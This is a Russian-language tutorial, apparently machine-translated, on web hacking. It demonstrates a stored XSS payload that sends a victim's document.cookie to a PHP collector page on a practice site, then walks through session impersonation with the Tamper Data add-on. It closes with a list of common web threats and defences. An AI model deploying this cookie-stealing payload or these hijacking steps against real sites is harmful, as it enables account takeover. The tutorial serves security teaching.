Как взломать сайт? Распространенные методы взлома сайтов

Методы взлома веб-сайтов

Больше людей имеют доступ к Интернету, чем когда-либо прежде. Это побудило многие организации разработать веб-приложения, которые пользователи могут использовать в Интернете для взаимодействия с организацией. Плохо написанный код веб-приложений может быть использован для получения несанкционированного доступа к конфиденциальным данным и веб-серверам.

В этом уроке вы узнаете, как взламывать веб-сайты, и мы познакомим вас с методы взлома веб-приложений и меры противодействия вы можете установить защиту от таких атак.

Как взломать сайт

В этом практическом сценарии взлома веб-сайта мы собираемся перехватить пользовательский сеанс веб-приложения, расположенного по адресу www.techpanda.org. Мы будем использовать межсайтовый скриптинг для чтения идентификатора сеанса cookie, а затем использовать его для имитации сеанса законного пользователя.

Предполагается, что злоумышленник имеет доступ к веб-приложению и хочет перехватить сеансы других пользователей, использующих то же приложение. Целью этой атаки может быть получение администраторского доступа к веб-приложению, при условии, что учетная запись злоумышленника имеет ограниченный доступ.

Шаг 1) Открыть URL http://www.techpanda.org/.

В практических целях настоятельно рекомендуется получить доступ с помощью SQL-инъекции. Обратитесь к этому статья для получения дополнительной информации о том, как это сделать.

Шаг 2) Введите данные для входа.

Электронная почта для входа admin@google.com, пароль — Password2010.

Шаг 3) Проверьте приборную панель.

Если вы успешно вошли в систему, вы получите следующую панель управления

Взломать сайт

Шаг 4) Введите новый контент.

Нажмите «Добавить новый контакт» и введите следующее имя в качестве имени.

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Шаг 5) Добавить Javascript.

В приведенном выше коде используется JavaСценарий. Он добавляет гиперссылку с событием onclick.. Когда ничего не подозревающий пользователь щелкает ссылку, событие извлекает PHP идентификатор сеанса cookie и отправляет его в snatch_sess_id.php страница вместе с идентификатором сеанса в URL-адресе

Взломать сайт

Шаг 6) Добавить детали.

Введите оставшиеся данные, как показано ниже, и нажмите «Сохранить изменения».

Взломать сайт

Шаг 7) Проверьте приборную панель.

Ваша панель управления теперь будет выглядеть так, как показано на следующем экране.

Взломать сайт

Шаг 8) Проверьте идентификатор сеанса.

  • Поскольку код межсайтового сценария хранится в базе данных, он будет загружаться каждый раз, когда пользователи с правами доступа входят в систему.
  • Предположим, администратор входит в систему и нажимает на гиперссылку с надписью Dark.
  • Он/она получит окно с идентификатором сеанса, указанным в URL-адресе.
  • Взломать сайт

    Внимание: сценарий может отправлять значение на какой-то удаленный сервер, где хранится PHPSESSID, а затем пользователь перенаправляется обратно на веб-сайт, как будто ничего не произошло.

    Внимание: значение, которое вы получите, может отличаться от значения на этой веб-странице. учебник по взлому, но идея та же

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    На блок-схеме ниже показаны шаги, которые необходимо предпринять для выполнения этого упражнения.

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Вам нужно будет Firefox веб-браузер для этого раздела и надстройка Tamper Data
    • Открыто Firefox и установите надстройку, как показано на рисунках ниже.

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Найдите данные о несанкционированном доступе, затем нажмите «Установить», как показано выше.

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Нажмите «Принять и установить»…

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Нажмите «Перезагрузить сейчас», когда установка завершится.
    • Включить строку меню в Firefox если это не показано

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Нажмите на меню инструментов, затем выберите Tamper Data, как показано ниже.

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Вы получите следующее окно. Примечание: Если Windows не пусто, нажмите кнопку «Очистить»

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Нажмите меню «Начать тампер».
    • Вернуться к Firefox веб-браузер, введите http://www.techpanda.org/dashboard.php затем нажмите клавишу ввода, чтобы загрузить страницу
    • Вы получите следующее всплывающее окно от Tamper Data

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Всплывающее окно имеет три (3) варианта. Опция Tamper позволяет вам изменять информацию заголовка HTTP перед ее отправкой на сервер..
    • Нажмите на нее,
    • Вы увидите следующее окно

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Скопируйте Идентификатор сеанса PHP вы скопировали URL-адрес атаки и вставили его после знака равенства. Ваше значение теперь должно выглядеть так
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Нажмите кнопку ОК
    • Вы снова увидите всплывающее окно данных тампера.

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    • Снимите флажок «Продолжить вмешательство?»
    • Нажмите кнопку «Отправить», когда закончите.
    • Вы должны увидеть панель мониторинга, как показано ниже.

    Олицетворение сеанса с использованием Firefox и дополнение Tamper Data

    Внимание: мы не входили в систему, мы олицетворяли сеанс входа в систему, используя значение PHPSESSID, которое мы получили с помощью межсайтового скриптинга.

    Что такое веб-приложение? Что такое веб-угрозы?

    Веб-приложение (также известное как веб-сайт) — это приложение, основанное на модели клиент-сервер. сервер обеспечивает доступ к базе данных и бизнес-логику. Он размещен на веб-сервере. Клиентское приложение запускается в клиентском веб-браузере. Веб-приложения обычно пишутся на таких языках, как Java, C# и VB.Net, PHP, язык разметки ColdFusion и т. д. Механизмы баз данных, используемые в веб-приложениях, включают MySQL, MS SQL-сервер, PostgreSQL, SQLite, и т.д.

    Лучшие методы взлома веб-сайтов

    Большинство веб-приложений размещаются на общедоступных серверах, доступных через Интернет. Это делает их уязвимыми для атак из-за легкой доступности. Ниже приведены распространенные угрозы веб-приложений.

    • SQL-инъекция – целью этой угрозы может быть обход алгоритмов входа в систему, саботаж данных и т. д.
    • Атаки отказа в обслуживании– целью этой угрозы может быть запрет законным пользователям доступа к ресурсу.
    • Межсайтовый скриптинг XSS– Целью этой угрозы может быть внедрение кода, который может быть выполнен в браузере на стороне клиента.
    • Отравление файлов cookie/сессии– Целью этой угрозы является изменение файлов cookie/данных сеанса злоумышленником для получения несанкционированного доступа.
    • Вмешательство в форму – цель этой угрозы — изменить данные формы, такие как цены, в приложениях электронной коммерции, чтобы злоумышленник мог получать товары по сниженным ценам.
    • Ввод кода – цель этой угрозы – внедрить код, такой как PHP, Pythonи т. д., которые могут быть выполнены на сервере. Код может устанавливать бэкдоры, раскрывать конфиденциальную информацию и т. д.
    • порча– цель этой угрозы — изменить страницу, отображаемую на веб-сайте, и перенаправить все запросы страниц на одну страницу, содержащую сообщение злоумышленника.

    Как защитить свой сайт от хакеров?

    Организация может принять следующую политику для защиты от атак веб-сервера.

    • SQL-инъекция – очистка и проверка пользовательских параметров перед отправкой их в базу данных для обработки может помочь снизить вероятность атаки через SQL-инъекция. Ядро базы данных, такое как MS SQL Server, MySQLи т. д. поддерживают параметры и подготовленные операторы. Они намного безопаснее, чем традиционные операторы SQL.
    • Атаки типа «отказ в обслуживании» – брандмауэры можно использовать для отбрасывания трафика с подозрительного IP-адреса, если атака представляет собой простой DoS. Правильная конфигурация сетей и системы обнаружения вторжений также может помочь снизить вероятность DoS-атака был успешным.
    • Межсайтовый скриптинг – проверка и очистка заголовков, параметров, передаваемых через URL-адрес, параметров формы и скрытых значений могут помочь уменьшить XSS-атаки.
    • Отравление файлов cookie/сессии – этого можно предотвратить, зашифровав содержимое файлов cookie, отключив файлы cookie через некоторое время и связав файлы cookie с IP-адресом клиента, который использовался для их создания.
    • Закалка формы – этого можно предотвратить, проверив и проверив вводимые пользователем данные перед их обработкой.
    • Внедрение кода – этого можно предотвратить, рассматривая все параметры как данные, а не как исполняемый код. Для реализации этого можно использовать санацию и валидацию.
    • Порча – хорошая политика безопасности разработки веб-приложений должна гарантировать, что она запечатывает часто используемые уязвимости для доступа к веб-серверу. Это может быть правильная конфигурация операционной системы, программного обеспечения веб-сервера и лучшие методы обеспечения безопасности при разработке веб-приложений.
    Проверь это: 9 лучших URL-сканеров для проверки ссылок на наличие вредоносных программ

    Резюме

    • Веб-приложение основано на модели сервер-клиент. Клиентская сторона использует веб-браузер для доступа к ресурсам на сервере.
    • Веб-приложения обычно доступны через Интернет. Это делает их уязвимыми для атак.
    • Угрозы веб-приложений включают SQL-инъекцию, внедрение кода, XSS, порчу, отравление cookie-файлов и т. д.
    • Хорошая политика безопасности при разработке веб-приложений может помочь обеспечить их безопасность.